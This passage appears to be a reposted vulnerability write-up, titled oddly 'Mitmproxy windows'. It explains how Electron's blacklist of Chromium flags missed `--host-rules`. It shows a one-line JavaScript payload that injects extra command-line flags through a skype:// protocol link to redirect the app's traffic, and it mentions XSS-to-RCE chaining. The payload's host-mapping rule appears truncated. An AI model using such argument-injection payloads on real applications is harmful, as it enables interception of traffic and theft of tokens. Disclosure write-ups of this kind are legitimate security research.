Mitmproxy windows
11/29/2023

The patch relies on a static blacklist of available Chromium flags:

```cpp
bool CheckCommandLineArguments(int argc, base::CommandLine::CharType** argv)
```

As is commonly seen, blacklist-based validation is prone to errors and omissions, especially in complex execution environments such as Electron:

- On each libchromiumcontent update, the Electron team must remember to update the command_line_ source file to make sure the blacklist is aligned with the current implementation of Chromium/V8.
- The blacklist is implemented using a binary search. Valid flags can be missed by the check if the list is not properly sorted.

We started looking for missed flags and noticed that `--host-rules` was absent from the blacklist. With this flag, one may specify a set of rules to rewrite domain names for requests issued by libchromiumcontent. This immediately sticks out as a good candidate for subverting the process.

In fact, an attacker can exploit this issue by overriding the host definitions in order to perform a completely transparent Man-In-The-Middle:

```javascript
location = 'skype://user?userinfo" --host-rules="MAP * " --foobar='
```

When a user visits a web page in a browser containing the preceding code, the Skype app will be launched and all Chromium traffic will be forwarded to the attacker-controlled host instead of the original domain. Since the connection is made to the attacker-controlled host, certificate validation does not help, as demonstrated in the following video:

We analyzed the impact of this vulnerability on popular Electron-based apps and developed working proofs-of-concept for both MITM and RCE attacks. While the immediate implication is that an attacker can obtain confidential data (e.g. OAuth tokens), this issue can also be abused to inject malicious HTML responses containing XSS -> RCE payloads.